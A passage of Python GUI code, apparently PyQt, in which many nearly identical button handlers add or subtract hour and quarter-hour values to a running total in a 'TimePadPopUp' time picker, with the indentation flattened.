if self.uip.pushButton15.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 15
elif self.uip.pushButton15.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 15
print(TimePadPopUp.a)
def Button16(self):
if self.uip.pushButton16.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 16
elif self.uip.pushButton16.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 16
print(TimePadPopUp.a)
def Button17(self):
if self.uip.pushButton17.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 17
elif self.uip.pushButton17.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 17
print(TimePadPopUp.a)
def Button18(self):
if self.uip.pushButton18.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 18
elif self.uip.pushButton18.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 18
print(TimePadPopUp.a)
def Button19(self):
if self.uip.pushButton19.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 19
elif self.uip.pushButton19.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 19
print(TimePadPopUp.a)
def Button20(self):
if self.uip.pushButton20.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 20
elif self.uip.pushButton20.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 20
print(TimePadPopUp.a)
def Button21(self):
if self.uip.pushButton21.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 21
elif self.uip.pushButton21.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 21
print(TimePadPopUp.a)
def Button22(self):
if self.uip.pushButton22.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 22
elif self.uip.pushButton22.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 22
print(TimePadPopUp.a)
def Button23(self):
if self.uip.pushButton23.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 23
elif self.uip.pushButton23.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 23
print(TimePadPopUp.a)
def Button24(self):
if self.uip.pushButton24.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 24
elif self.uip.pushButton24.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 24
print(TimePadPopUp.a)
def Button25(self):
if self.uip.pushButton25.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 25
elif self.uip.pushButton25.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 25
print(TimePadPopUp.a)
def Button26(self):
if self.uip.pushButton26.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 26
elif self.uip.pushButton26.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 26
print(TimePadPopUp.a)
def Button0015(self):
if self.uip.pushButton0015.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.25
elif self.uip.pushButton0015.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.25
print(TimePadPopUp.a)
def Button0030(self):
if self.uip.pushButton0030.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.5
elif self.uip.pushButton0030.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.5
print(TimePadPopUp.a)
def Button0045(self):
if self.uip.pushButton0045.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.75
elif self.uip.pushButton0045.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.75
print(TimePadPopUp.a)
def Button0000(self):
if self.uip.pushButton0000.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.0
elif self.uip.pushButton0000.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.0
print(TimePadPopUp.a) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.